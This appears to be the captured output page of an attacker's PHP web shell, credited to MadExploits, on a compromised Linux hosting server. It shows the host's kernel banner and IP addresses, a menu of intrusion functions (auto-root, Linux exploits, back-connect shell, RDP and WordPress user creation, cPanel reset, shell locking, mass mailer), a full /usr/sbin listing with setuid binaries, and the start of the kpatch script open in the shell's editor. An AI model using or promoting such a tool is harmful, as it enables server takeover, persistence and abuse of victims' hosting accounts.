Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
sbin /
[ HOME SHELL ]
Name
Size
Permission
Action
NetworkManager
3.69
MB
-rwxr-xr-x
accessdb
15.42
KB
-rwxr-xr-x
accton
15.93
KB
-rwxr-xr-x
acpid
56.13
KB
-rwxr-xr-x
adcli
171.56
KB
-rwxr-xr-x
addgnupghome
3.01
KB
-rwxr-xr-x
addpart
15.16
KB
-rwxr-xr-x
adduser
137.83
KB
-rwxr-xr-x
agetty
56.71
KB
-rwxr-xr-x
alternatives
39.59
KB
-rwxr-xr-x
anacron
39.52
KB
-rwxr-xr-x
apachectl
4.7
KB
-rwxr-xr-x
applygnupgdefaults
2.17
KB
-rwxr-xr-x
arp
63.21
KB
-rwxr-xr-x
arping
27.25
KB
-rwxr-xr-x
arptables
231.41
KB
-rwxr-xr-x
arptables-nft
231.41
KB
-rwxr-xr-x
arptables-nft-restore
231.41
KB
-rwxr-xr-x
arptables-nft-save
231.41
KB
-rwxr-xr-x
arptables-restore
231.41
KB
-rwxr-xr-x
arptables-save
231.41
KB
-rwxr-xr-x
atd
31.26
KB
-rwxr-xr-x
atrun
70
B
-rwxr-xr-x
auditctl
51.59
KB
-rwxr-xr-x
auditd
137.05
KB
-rwxr-xr-x
augenrules
4.05
KB
-rwxr-xr-x
aureport
120.3
KB
-rwxr-xr-x
ausearch
120.27
KB
-rwxr-xr-x
autrace
19.17
KB
-rwxr-x---
avcstat
15.35
KB
-rwxr-xr-x
badblocks
35.35
KB
-rwxr-xr-x
biosdecode
28.26
KB
-rwxr-xr-x
blkdeactivate
15.97
KB
-r-xr-xr-x
blkdiscard
23.2
KB
-rwxr-xr-x
blkid
51.61
KB
-rwxr-xr-x
blkmapd
39.42
KB
-rwxr-xr-x
blkzone
35.46
KB
-rwxr-xr-x
blockdev
31.42
KB
-rwxr-xr-x
bpftool
625.94
KB
-rwxr-xr-x
bridge
130.93
KB
-rwxr-xr-x
cache_check
2.91
MB
-rwxr-xr-x
cache_dump
2.91
MB
-rwxr-xr-x
cache_metadata_size
2.91
MB
-rwxr-xr-x
cache_repair
2.91
MB
-rwxr-xr-x
cache_restore
2.91
MB
-rwxr-xr-x
cache_writeback
2.91
MB
-rwxr-xr-x
capsh
31.21
KB
-rwxr-xr-x
cfdisk
96.34
KB
-rwxr-xr-x
cgdisk
150.86
KB
-rwxr-xr-x
chcpu
31.42
KB
-rwxr-xr-x
chgpasswd
59.77
KB
-rwxr-xr-x
chkconfig
43.78
KB
-rwxr-xr-x
chpasswd
55.63
KB
-rwxr-xr-x
chronyd
369.44
KB
-rwxr-xr-x
chroot
39.73
KB
-rwxr-xr-x
clock
59.77
KB
-rwxr-xr-x
collectd
226.45
KB
-rwxr-xr-x
collectdmon
15.15
KB
-rwxr-xr-x
consoletype
15.28
KB
-rwxr-xr-x
convertquota
69.01
KB
-rwxr-xr-x
cracklib-check
15.7
KB
-rwxr-xr-x
cracklib-format
255
B
-rwxr-xr-x
cracklib-packer
15.7
KB
-rwxr-xr-x
cracklib-unpacker
15.69
KB
-rwxr-xr-x
create-cracklib-dict
994
B
-rwxr-xr-x
crond
76.16
KB
-rwxr-xr-x
cryptsetup
232.41
KB
-rwxr-xr-x
csf
292.6
KB
-rwx------
ctrlaltdel
15.19
KB
-rwxr-xr-x
ctstat
23.59
KB
-rwxr-xr-x
dcb
94.69
KB
-rwxr-xr-x
ddns-confgen
27.26
KB
-rwxr-xr-x
debugfs
233.03
KB
-rwxr-xr-x
delpart
15.13
KB
-rwxr-xr-x
depmod
165.57
KB
-rwxr-xr-x
devlink
161.81
KB
-rwxr-xr-x
dhclient
1.91
MB
-rwxr-xr-x
dhclient-script
32.86
KB
-rwxr-xr-x
dmeventd
51.77
KB
-r-xr-xr-x
dmfilemapd
23.3
KB
-r-xr-xr-x
dmidecode
156.49
KB
-rwxr-xr-x
dmsetup
156.77
KB
-r-xr-xr-x
dmstats
156.77
KB
-r-xr-xr-x
dnssec-cds
47.67
KB
-rwxr-xr-x
dnssec-checkds
924
B
-rwxr-xr-x
dnssec-coverage
926
B
-rwxr-xr-x
dnssec-dsfromkey
39.44
KB
-rwxr-xr-x
dnssec-importkey
35.44
KB
-rwxr-xr-x
dnssec-keyfromlabel
39.42
KB
-rwxr-xr-x
dnssec-keygen
47.45
KB
-rwxr-xr-x
dnssec-keymgr
922
B
-rwxr-xr-x
dnssec-revoke
31.41
KB
-rwxr-xr-x
dnssec-settime
47.44
KB
-rwxr-xr-x
dnssec-signzone
95.88
KB
-rwxr-xr-x
dnssec-verify
31.45
KB
-rwxr-xr-x
dosfsck
84.56
KB
-rwxr-xr-x
dosfslabel
40.02
KB
-rwxr-xr-x
dovecot
143.55
KB
-rwxr-xr-x
dovecot_cpshutdown
3.27
KB
-rwxr-xr-x
dump-acct
24.18
KB
-rwxr-xr-x
dump-utmp
16.03
KB
-rwxr-xr-x
dumpe2fs
31.29
KB
-rwxr-xr-x
e2freefrag
15.19
KB
-rwxr-xr-x
e2fsck
356.09
KB
-rwxr-xr-x
e2image
43.41
KB
-rwxr-xr-x
e2label
104.46
KB
-rwxr-xr-x
e2mmpstatus
31.29
KB
-rwxr-xr-x
e2undo
23.16
KB
-rwxr-xr-x
e4crypt
31.3
KB
-rwxr-xr-x
e4defrag
31.26
KB
-rwxr-xr-x
ebtables
231.41
KB
-rwxr-xr-x
ebtables-nft
231.41
KB
-rwxr-xr-x
ebtables-nft-restore
231.41
KB
-rwxr-xr-x
ebtables-nft-save
231.41
KB
-rwxr-xr-x
ebtables-restore
231.41
KB
-rwxr-xr-x
ebtables-save
231.41
KB
-rwxr-xr-x
ebtables-translate
231.41
KB
-rwxr-xr-x
edquota
89.5
KB
-rwxr-xr-x
era_check
2.91
MB
-rwxr-xr-x
era_dump
2.91
MB
-rwxr-xr-x
era_invalidate
2.91
MB
-rwxr-xr-x
era_restore
2.91
MB
-rwxr-xr-x
ether-wake
50.24
KB
-rwxr-xr-x
ethtool
988.96
KB
-rwxr-xr-x
exicyclog
11.1
KB
-rwxr-xr-x
exigrep
11.44
KB
-rwxr-xr-x
exim
1.55
MB
-rwsr-xr-x
exim_checkaccess
4.83
KB
-rwxr-xr-x
exim_dbmbuild
22.45
KB
-rwxr-xr-x
exim_dumpdb
23.68
KB
-rwxr-xr-x
exim_fixdb
32.24
KB
-rwxr-xr-x
exim_lock
22.79
KB
-rwxr-xr-x
exim_tidydb
23.7
KB
-rwxr-xr-x
eximstats
149.14
KB
-rwxr-xr-x
exinext
8.03
KB
-rwxr-xr-x
exiqgrep
6.58
KB
-rwxr-xr-x
exiqsumm
6.29
KB
-rwxr-xr-x
exiwhat
4.42
KB
-rwxr-xr-x
exportfs
68.46
KB
-rwxr-xr-x
faillock
23.18
KB
-rwxr-xr-x
fatlabel
40.02
KB
-rwxr-xr-x
fcgistarter
24.71
KB
-rwxr-xr-x
fdformat
23.2
KB
-rwxr-xr-x
fdisk
112.07
KB
-rwxr-xr-x
filefrag
19.22
KB
-rwxr-xr-x
findfs
15.16
KB
-rwxr-xr-x
firewalld
9.75
KB
-rwxr-xr-x
fix-info-dir
7.85
KB
-rwxr-xr-x
fixfiles
12.1
KB
-rwxr-xr-x
fixparts
60.98
KB
-rwxr-xr-x
fsadm
24.03
KB
-r-xr-xr-x
fsck
43.55
KB
-rwxr-xr-x
fsck.cramfs
31.38
KB
-rwxr-xr-x
fsck.ext2
356.09
KB
-rwxr-xr-x
fsck.ext3
356.09
KB
-rwxr-xr-x
fsck.ext4
356.09
KB
-rwxr-xr-x
fsck.fat
84.56
KB
-rwxr-xr-x
fsck.minix
55.71
KB
-rwxr-xr-x
fsck.msdos
84.56
KB
-rwxr-xr-x
fsck.vfat
84.56
KB
-rwxr-xr-x
fsck.xfs
2.54
KB
-rwxr-xr-x
fsfreeze
15.16
KB
-rwxr-xr-x
fstrim
43.51
KB
-rwxr-xr-x
fuser
41.09
KB
-rwxr-xr-x
g13-syshelp
88.6
KB
-rwxr-xr-x
gdisk
187.38
KB
-rwxr-xr-x
genhomedircon
32.04
KB
-rwxr-xr-x
genhostid
15.28
KB
-rwxr-xr-x
genl
130.1
KB
-rwxr-xr-x
getcap
15.13
KB
-rwxr-xr-x
getenforce
15.27
KB
-rwxr-xr-x
getpcaps
15.12
KB
-rwxr-xr-x
getpidprevcon
15.29
KB
-rwxr-xr-x
getpolicyload
15.28
KB
-rwxr-xr-x
getsebool
15.3
KB
-rwxr-xr-x
groupadd
68.77
KB
-rwxr-xr-x
groupdel
64.53
KB
-rwxr-xr-x
groupmems
55.77
KB
-rwxr-xr-x
groupmod
72.76
KB
-rwxr-xr-x
grpck
59.76
KB
-rwxr-xr-x
grpconv
51.56
KB
-rwxr-xr-x
grpunconv
51.53
KB
-rwxr-xr-x
grub2-bios-setup
1.34
MB
-rwxr-xr-x
grub2-get-kernel-settings
2.68
KB
-rwxr-xr-x
grub2-install
1.65
MB
-rwxr-xr-x
grub2-macbless
1.33
MB
-rwxr-xr-x
grub2-mkconfig
9.21
KB
-rwxr-xr-x
grub2-probe
1.35
MB
-rwxr-xr-x
grub2-reboot
4.7
KB
-rwxr-xr-x
grub2-set-bootflag
15.09
KB
-rwxr-xr-x
grub2-set-default
3.46
KB
-rwxr-xr-x
grub2-set-password
2.74
KB
-rwxr-xr-x
grub2-setpassword
2.74
KB
-rwxr-xr-x
grub2-switch-to-blscfg
8.81
KB
-rwxr-xr-x
grubby
260
B
-rwxr-xr-x
gssproxy
124.89
KB
-rwxr-xr-x
halt
298.42
KB
-rwxr-xr-x
hdparm
143.06
KB
-rwxr-xr-x
htcacheclean
52.8
KB
-rwxr-xr-x
httpd
1.09
MB
-rwxr-xr-x
hwclock
59.77
KB
-rwxr-xr-x
iconvconfig
31.68
KB
-rwxr-xr-x
ifconfig
78.98
KB
-rwxr-xr-x
ifenslave
23.73
KB
-rwxr-xr-x
ifstat
39.6
KB
-rwxr-xr-x
imunify-notifier
9.86
MB
-rwxr-xr-x
init
95.74
KB
-rwxr-xr-x
insmod
165.57
KB
-rwxr-xr-x
install-info
106.7
KB
-rwxr-xr-x
installkernel
323
B
-rwxr-xr-x
intel_sdsi
22.43
KB
-rwxr-xr-x
ip
770.19
KB
-rwxr-xr-x
ip6tables
231.41
KB
-rwxr-xr-x
ip6tables-nft
231.41
KB
-rwxr-xr-x
ip6tables-nft-restore
231.41
KB
-rwxr-xr-x
ip6tables-nft-save
231.41
KB
-rwxr-xr-x
ip6tables-restore
231.41
KB
-rwxr-xr-x
ip6tables-restore-translate
231.41
KB
-rwxr-xr-x
ip6tables-save
231.41
KB
-rwxr-xr-x
ip6tables-translate
231.41
KB
-rwxr-xr-x
ipmaddr
19.45
KB
-rwxr-xr-x
iprconfig
405.15
KB
-rwxr-xr-x
iprdbg
56.27
KB
-rwxr-xr-x
iprdump
32.02
KB
-rwxr-xr-x
iprinit
76.68
KB
-rwxr-xr-x
iprsos
2.19
KB
-rwxr-xr-x
iprupdate
90.26
KB
-rwxr-xr-x
ipset
15.27
KB
-rwxr-xr-x
ipset-translate
15.27
KB
-rwxr-xr-x
iptables
231.41
KB
-rwxr-xr-x
iptables-nft
231.41
KB
-rwxr-xr-x
iptables-nft-restore
231.41
KB
-rwxr-xr-x
iptables-nft-save
231.41
KB
-rwxr-xr-x
iptables-restore
231.41
KB
-rwxr-xr-x
iptables-restore-translate
231.41
KB
-rwxr-xr-x
iptables-save
231.41
KB
-rwxr-xr-x
iptables-translate
231.41
KB
-rwxr-xr-x
iptunnel
19.5
KB
-rwxr-xr-x
irqbalance
64.45
KB
-rwxr-xr-x
irqbalance-ui
39.59
KB
-rwxr-xr-x
kacpimon
19.26
KB
-rwxr-xr-x
kexec
192.6
KB
-rwxr-xr-x
key.dns_resolver
31.35
KB
-rwxr-xr-x
kpartx
47.52
KB
-rwxr-xr-x
kpatch
16.59
KB
-rwxr-xr-x
lchage
23.16
KB
-rwxr-xr-x
ldattach
27.23
KB
-rwxr-xr-x
ldconfig
1.12
MB
-rwxr-xr-x
ledctl
99.14
KB
-rwxr-xr-x
ledmon
96.79
KB
-rwxr-xr-x
lfd
459.46
KB
-rwx------
lgroupadd
15.12
KB
-rwxr-xr-x
lgroupdel
15.11
KB
-rwxr-xr-x
lgroupmod
23.13
KB
-rwxr-xr-x
lid
19.13
KB
-rwxr-xr-x
lnewusers
23.13
KB
-rwxr-xr-x
lnstat
23.59
KB
-rwxr-xr-x
load_policy
15.12
KB
-rwxr-xr-x
logrotate
95.66
KB
-rwxr-xr-x
logsave
15.19
KB
-rwxr-xr-x
losetup
72.09
KB
-rwxr-xr-x
lpasswd
23.13
KB
-rwxr-xr-x
lshw
853.59
KB
-rwxr-xr-x
lsmod
165.57
KB
-rwxr-xr-x
lspci
97.57
KB
-rwxr-xr-x
luseradd
23.13
KB
-rwxr-xr-x
luserdel
15.12
KB
-rwxr-xr-x
lusermod
23.13
KB
-rwxr-xr-x
lvchange
2.69
MB
-r-xr-xr-x
lvconvert
2.69
MB
-r-xr-xr-x
lvcreate
2.69
MB
-r-xr-xr-x
lvdisplay
2.69
MB
-r-xr-xr-x
lvextend
2.69
MB
-r-xr-xr-x
lvm
2.69
MB
-r-xr-xr-x
lvm_import_vdo
23.15
KB
-r-xr-xr-x
lvmconfig
2.69
MB
-r-xr-xr-x
lvmdevices
2.69
MB
-r-xr-xr-x
lvmdiskscan
2.69
MB
-r-xr-xr-x
lvmdump
10.13
KB
-r-xr-xr-x
lvmpolld
210.3
KB
-r-xr-xr-x
lvmsadc
2.69
MB
-r-xr-xr-x
lvmsar
2.69
MB
-r-xr-xr-x
lvreduce
2.69
MB
-r-xr-xr-x
lvremove
2.69
MB
-r-xr-xr-x
lvrename
2.69
MB
-r-xr-xr-x
lvresize
2.69
MB
-r-xr-xr-x
lvs
2.69
MB
-r-xr-xr-x
lvscan
2.69
MB
-r-xr-xr-x
makedumpfile
427.85
KB
-rwxr-xr-x
matchpathcon
15.31
KB
-rwxr-xr-x
mcelog
207.8
KB
-rwxr-xr-x
md-auto-readd.sh
401
B
-rwxr-xr-x
mdadm
633.92
KB
-rwxr-xr-x
mdmon
296.34
KB
-rwxr-xr-x
mii-diag
24.2
KB
-rwxr-xr-x
mii-tool
27.78
KB
-rwxr-xr-x
mkdict
255
B
-rwxr-xr-x
mkdosfs
52.51
KB
-rwxr-xr-x
mkdumprd
12.47
KB
-rwxr-xr-x
mke2fs
132.53
KB
-rwxr-xr-x
mkfs
15.17
KB
-rwxr-xr-x
mkfs.cramfs
35.38
KB
-rwxr-xr-x
mkfs.ext2
132.53
KB
-rwxr-xr-x
mkfs.ext3
132.53
KB
-rwxr-xr-x
mkfs.ext4
132.53
KB
-rwxr-xr-x
mkfs.fat
52.51
KB
-rwxr-xr-x
mkfs.minix
43.55
KB
-rwxr-xr-x
mkfs.msdos
52.51
KB
-rwxr-xr-x
mkfs.vfat
52.51
KB
-rwxr-xr-x
mkfs.xfs
450.77
KB
-rwxr-xr-x
mkhomedir_helper
23.21
KB
-rwxr-xr-x
mklost+found
15.12
KB
-rwxr-xr-x
mksquashfs
197.62
KB
-rwxr-xr-x
mkswap
47.5
KB
-rwxr-xr-x
modinfo
165.57
KB
-rwxr-xr-x
modprobe
165.57
KB
-rwxr-xr-x
modsec-sdbm-util
33.56
KB
-rwxr-x---
mount.fuse
15.34
KB
-rwxr-xr-x
mount.nfs
100.52
KB
-rwxr-xr-x
mount.nfs4
100.52
KB
-rwxr-xr-x
mountstats
42.5
KB
-rwxr-xr-x
mtr
73.68
KB
-rwxr-xr-x
mtr-packet
35.6
KB
-rwxr-xr-x
mysqld
60.69
MB
-rwxr-xr-x
named
545
KB
-rwxr-xr-x
named-checkconf
39.4
KB
-rwxr-xr-x
named-checkzone
39.34
KB
-rwxr-xr-x
named-compilezone
39.34
KB
-rwxr-xr-x
named-journalprint
15.13
KB
-rwxr-xr-x
named-nzd2nzf
15.12
KB
-rwxr-xr-x
nameif
15.58
KB
-rwxr-xr-x
newusers
88.71
KB
-rwxr-xr-x
nfsconf
39.87
KB
-rwxr-xr-x
nfsdcld
55.88
KB
-rwxr-xr-x
nfsdclddb
9.99
KB
-rwxr-xr-x
nfsdclnts
9.05
KB
-rwxr-xr-x
nfsdcltrack
39.92
KB
-rwxr-xr-x
nfsidmap
23.3
KB
-rwxr-xr-x
nfsiostat
23.35
KB
-rwxr-xr-x
nfsref
43.52
KB
-rwxr-xr-x
nfsstat
38.27
KB
-rwxr-xr-x
nft
27.17
KB
-rwxr-xr-x
nologin
15.16
KB
-rwxr-xr-x
nscd
162.95
KB
-rwxr-xr-x
nsec3hash
15.2
KB
-rwxr-xr-x
nstat
31.34
KB
-rwxr-xr-x
nvme
1.49
MB
-rwxr-xr-x
ownership
15.33
KB
-rwxr-xr-x
packer
15.7
KB
-rwxr-xr-x
pam_console_apply
43.51
KB
-rwxr-xr-x
pam_namespace_helper
471
B
-rwxr-xr-x
pam_timestamp_check
15.13
KB
-rwxr-xr-x
paperconfig
4.08
KB
-rwxr-xr-x
parted
96.39
KB
-rwxr-xr-x
partprobe
15.34
KB
-rwxr-xr-x
partx
59.77
KB
-rwxr-xr-x
pdata_tools
2.91
MB
-rwxr-xr-x
pdns_server
5.86
MB
-rwxr-xr-x
pidof
23.33
KB
-rwxr-xr-x
ping
89.33
KB
-rwxr-xr-x
ping6
89.33
KB
-rwxr-xr-x
pivot_root
15.16
KB
-rwxr-xr-x
plipconfig
15.35
KB
-rwxr-xr-x
pluginviewer
19.39
KB
-rwxr-xr-x
poweroff
298.42
KB
-rwxr-xr-x
pure-authd
23.02
KB
-rwxr-xr-x
pure-certd
22.92
KB
-rwxr-xr-x
pure-config.pl
4.64
KB
-rwxr-xr-x
pure-ftpd
177.13
KB
-rwxr-xr-x
pure-ftpwho
26.58
KB
-rwxr-xr-x
pure-mrtginfo
14.55
KB
-rwxr-xr-x
pure-quotacheck
22.56
KB
-rwxr-xr-x
pure-uploadscript
22.83
KB
-rwxr-xr-x
pvchange
2.69
MB
-r-xr-xr-x
pvck
2.69
MB
-r-xr-xr-x
pvcreate
2.69
MB
-r-xr-xr-x
pvdisplay
2.69
MB
-r-xr-xr-x
pvmove
2.69
MB
-r-xr-xr-x
pvremove
2.69
MB
-r-xr-xr-x
pvresize
2.69
MB
-r-xr-xr-x
pvs
2.69
MB
-r-xr-xr-x
pvscan
2.69
MB
-r-xr-xr-x
pwck
55.6
KB
-rwxr-xr-x
pwconv
47.45
KB
-rwxr-xr-x
pwhistory_helper
19.2
KB
-rwxr-xr-x
pwunconv
47.41
KB
-rwxr-xr-x
quotacheck
93.62
KB
-rwxr-xr-x
quotaoff
56.67
KB
-rwxr-xr-x
quotaon
56.67
KB
-rwxr-xr-x
quotastats
15.34
KB
-rwxr-xr-x
raid-check
3.71
KB
-rwxr-xr-x
rdisc
31.36
KB
-rwxr-xr-x
rdma
113.02
KB
-rwxr-xr-x
readprofile
23.27
KB
-rwxr-xr-x
realm
96.9
KB
-rwxr-xr-x
reboot
298.42
KB
-rwxr-xr-x
repquota
77.55
KB
-rwxr-xr-x
request-key
27.29
KB
-rwxr-xr-x
resize2fs
67.64
KB
-rwxr-xr-x
resizepart
23.4
KB
-rwxr-xr-x
restorecon
23.19
KB
-rwxr-xr-x
restorecon_xattr
15.13
KB
-rwxr-xr-x
rfkill
31.34
KB
-rwxr-xr-x
rmmod
165.57
KB
-rwxr-xr-x
rndc
43.25
KB
-rwxr-xr-x
rndc-confgen
23.26
KB
-rwxr-xr-x
rotatelogs
38.13
KB
-rwxr-xr-x
route
65.77
KB
-rwxr-xr-x
rpc.gssd
88.11
KB
-rwxr-xr-x
rpc.idmapd
47.73
KB
-rwxr-xr-x
rpc.mountd
132.56
KB
-rwxr-xr-x
rpc.nfsd
40
KB
-rwxr-xr-x
rpc.statd
80.79
KB
-rwxr-xr-x
rpcbind
59.89
KB
-rwxr-xr-x
rpcctl
9.42
KB
-rwxr-xr-x
rpcdebug
18.66
KB
-rwxr-xr-x
rpcinfo
35.58
KB
-rwxr-xr-x
rsyslogd
794.28
KB
-rwxr-xr-x
rtacct
29.34
KB
-rwxr-xr-x
rtcwake
35.26
KB
-rwxr-xr-x
rtkitctl
15.24
KB
-rwxr-xr-x
rtmon
126.02
KB
-rwxr-xr-x
rtstat
23.59
KB
-rwxr-xr-x
runlevel
298.42
KB
-rwxr-xr-x
runq
1.55
MB
-rwsr-xr-x
runuser
55.62
KB
-rwxr-xr-x
sa
37.15
KB
-rwxr-xr-x
sasl2-shared-mechlist
15.13
KB
-rwxr-xr-x
saslauthd
88.33
KB
-rwxr-xr-x
sasldblistusers2
15.27
KB
-rwxr-xr-x
saslpasswd2
15.24
KB
-rwxr-xr-x
sedispatch
19.16
KB
-rwxr-xr-x
sefcontext_compile
72.38
KB
-rwxr-xr-x
selabel_digest
15.31
KB
-rwxr-xr-x
selabel_get_digests_all_partia...
15.33
KB
-rwxr-xr-x
selabel_lookup
15.3
KB
-rwxr-xr-x
selabel_lookup_best_match
15.31
KB
-rwxr-xr-x
selabel_partial_match
15.3
KB
-rwxr-xr-x
selinux_check_access
15.31
KB
-rwxr-xr-x
selinuxconlist
15.3
KB
-rwxr-xr-x
selinuxdefcon
15.3
KB
-rwxr-xr-x
selinuxenabled
15.27
KB
-rwxr-xr-x
selinuxexeccon
15.29
KB
-rwxr-xr-x
semanage
40.64
KB
-rwxr-xr-x
semodule
32.04
KB
-rwxr-xr-x
sendmail
18.08
KB
-rwxr-sr-x
service
4.51
KB
-rwxr-xr-x
sestatus
23.13
KB
-rwxr-xr-x
setcap
15.13
KB
-rwxr-xr-x
setenforce
15.3
KB
-rwxr-xr-x
setfiles
23.19
KB
-rwxr-xr-x
setpci
31.35
KB
-rwxr-xr-x
setquota
81.58
KB
-rwxr-xr-x
setroubleshootd
3.07
KB
-rwxr-xr-x
setsebool
19.15
KB
-rwxr-xr-x
sfdisk
103.98
KB
-rwxr-xr-x
sgdisk
167.14
KB
-rwxr-xr-x
showmount
15.48
KB
-rwxr-xr-x
shutdown
298.42
KB
-rwxr-xr-x
slattach
37.57
KB
-rwxr-xr-x
sm-notify
51.77
KB
-rwxr-xr-x
smartctl
853.95
KB
-rwxr-xr-x
smartd
615.6
KB
-rwxr-xr-x
sos
615
B
-rwxr-xr-x
sos-collector
135
B
-rwxr-xr-x
sosreport
128
B
-rwxr-xr-x
ss
131.3
KB
-rwxr-xr-x
sshd
950.11
KB
-rwxr-xr-x
sss_cache
35.25
KB
-rwxr-xr-x
sssd
71.61
KB
-rwxr-xr-x
start-statd
1
KB
-rwxr-xr-x
start-stop-daemon
48.65
KB
-rwxr-xr-x
suexec
37.6
KB
-rwsr-xr-x
sulogin
43.41
KB
-rwxr-xr-x
sw-engine-fpm
24.14
MB
-rwxr-xr-x
swaplabel
19.18
KB
-rwxr-xr-x
swapoff
23.27
KB
-rwxr-xr-x
swapon
43.31
KB
-rwxr-xr-x
switch_root
23.21
KB
-rwxr-xr-x
sysctl
31.49
KB
-rwxr-xr-x
tc
627.91
KB
-rwxr-xr-x
tcpdump
1.28
MB
-rwxr-xr-x
tcpslice
27.39
KB
-rwxr-xr-x
telinit
298.42
KB
-rwxr-xr-x
testsaslauthd
15.16
KB
-rwxr-xr-x
thin_check
2.91
MB
-rwxr-xr-x
thin_delta
2.91
MB
-rwxr-xr-x
thin_dump
2.91
MB
-rwxr-xr-x
thin_ls
2.91
MB
-rwxr-xr-x
thin_metadata_pack
2.91
MB
-rwxr-xr-x
thin_metadata_size
2.91
MB
-rwxr-xr-x
thin_metadata_unpack
2.91
MB
-rwxr-xr-x
thin_migrate
2.91
MB
-rwxr-xr-x
thin_repair
2.91
MB
-rwxr-xr-x
thin_restore
2.91
MB
-rwxr-xr-x
thin_rmap
2.91
MB
-rwxr-xr-x
thin_trim
2.91
MB
-rwxr-xr-x
tipc
92.8
KB
-rwxr-xr-x
tmpwatch
36.03
KB
-rwxr-xr-x
tracepath
19.22
KB
-rwxr-xr-x
tracepath6
19.22
KB
-rwxr-xr-x
tsig-keygen
27.26
KB
-rwxr-xr-x
tune2fs
104.46
KB
-rwxr-xr-x
tuned
3.87
KB
-rwxr-xr-x
tuned-adm
6.68
KB
-rwxr-xr-x
udevadm
583.8
KB
-rwxr-xr-x
umount.nfs
100.52
KB
-rwxr-xr-x
umount.nfs4
100.52
KB
-rwxr-xr-x
unix_chkpwd
23.28
KB
-rwxr-xr-x
unix_update
31.32
KB
-rwx------
unsquashfs
113.8
KB
-rwxr-xr-x
update-alternatives
39.59
KB
-rwxr-xr-x
update-pciids
1.72
KB
-rwxr-xr-x
update-smart-drivedb
23.33
KB
-rwxr-xr-x
useradd
137.83
KB
-rwxr-xr-x
userdel
88.84
KB
-rwxr-xr-x
usermod
129.66
KB
-rwxr-xr-x
validatetrans
15.29
KB
-rwxr-xr-x
vdpa
35.88
KB
-rwxr-xr-x
vgcfgbackup
2.69
MB
-r-xr-xr-x
vgcfgrestore
2.69
MB
-r-xr-xr-x
vgchange
2.69
MB
-r-xr-xr-x
vgck
2.69
MB
-r-xr-xr-x
vgconvert
2.69
MB
-r-xr-xr-x
vgcreate
2.69
MB
-r-xr-xr-x
vgdisplay
2.69
MB
-r-xr-xr-x
vgexport
2.69
MB
-r-xr-xr-x
vgextend
2.69
MB
-r-xr-xr-x
vgimport
2.69
MB
-r-xr-xr-x
vgimportclone
2.69
MB
-r-xr-xr-x
vgimportdevices
2.69
MB
-r-xr-xr-x
vgmerge
2.69
MB
-r-xr-xr-x
vgmknodes
2.69
MB
-r-xr-xr-x
vgreduce
2.69
MB
-r-xr-xr-x
vgremove
2.69
MB
-r-xr-xr-x
vgrename
2.69
MB
-r-xr-xr-x
vgs
2.69
MB
-r-xr-xr-x
vgscan
2.69
MB
-r-xr-xr-x
vgsplit
2.69
MB
-r-xr-xr-x
vigr
58.15
KB
-rwxr-xr-x
vipw
58.15
KB
-rwxr-xr-x
virt-what
15.71
KB
-rwxr-xr-x
virt-what-cvm
15.32
KB
-rwxr-xr-x
visudo
220.85
KB
-rwxr-xr-x
vmcore-dmesg
27.3
KB
-rwxr-xr-x
vpddecode
19.34
KB
-rwxr-xr-x
weak-modules
33.58
KB
-rwxr-xr-x
whmapi0
3.36
MB
-rwxr-xr-x
whmapi1
3.36
MB
-rwxr-xr-x
whmlogin
2.33
KB
-rwxr-xr-x
wipefs
39.28
KB
-rwxr-xr-x
xfs_admin
2.13
KB
-rwxr-xr-x
xfs_bmap
699
B
-rwxr-xr-x
xfs_copy
92.62
KB
-rwxr-xr-x
xfs_db
708.08
KB
-rwxr-xr-x
xfs_estimate
15.16
KB
-rwxr-xr-x
xfs_freeze
804
B
-rwxr-xr-x
xfs_fsr
43.51
KB
-rwxr-xr-x
xfs_growfs
43.63
KB
-rwxr-xr-x
xfs_info
1.27
KB
-rwxr-xr-x
xfs_io
202.59
KB
-rwxr-xr-x
xfs_logprint
88.26
KB
-rwxr-xr-x
xfs_mdrestore
27.28
KB
-rwxr-xr-x
xfs_metadump
786
B
-rwxr-xr-x
xfs_mkfile
1.02
KB
-rwxr-xr-x
xfs_ncheck
689
B
-rwxr-xr-x
xfs_quota
92.1
KB
-rwxr-xr-x
xfs_repair
686.23
KB
-rwxr-xr-x
xfs_rtcp
19.14
KB
-rwxr-xr-x
xfs_spaceman
43.78
KB
-rwxr-xr-x
xfsdump
285.03
KB
-rwxr-xr-x
xfsinvutil
61.02
KB
-rwxr-xr-x
xfsrestore
334.09
KB
-rwxr-xr-x
xqmstats
15.33
KB
-rwxr-xr-x
xtables-monitor
231.41
KB
-rwxr-xr-x
xtables-nft-multi
231.41
KB
-rwxr-xr-x
zic
59.63
KB
-rwxr-xr-x
zramctl
55.88
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kpatch
#!/usr/bin/bash # # kpatch hot patch module management script # # Copyright (C) 2014 Seth Jennings <sjenning@redhat.com> # Copyright (C) 2014 Josh Poimboeuf <jpoimboe@redhat.com> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA, # 02110-1301, USA. # This is the kpatch user script that manages installing, loading, and # displaying information about kernel patch modules installed on the system. INSTALLDIR=/var/lib/kpatch SCRIPTDIR="$(readlink -f "$(dirname "$(type -p "$0")")")" VERSION="0.9.7" POST_ENABLE_WAIT=15 # seconds POST_SIGNAL_WAIT=60 # seconds MODULE_REF_WAIT=15 # seconds # How many times to try loading the patch if activeness safety check fails. MAX_LOAD_ATTEMPTS=5 # How long to wait before retry, in seconds. RETRY_INTERVAL=2 usage_cmd() { printf ' %-20s\n%s\n' "$1" "$(fmt -w 80 <(echo " $2"))" >&2 } usage () { # ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION ATTENTION # When changing this, please also update the man page. Thanks! echo "usage: kpatch <command> [<args>]" >&2 echo >&2 echo 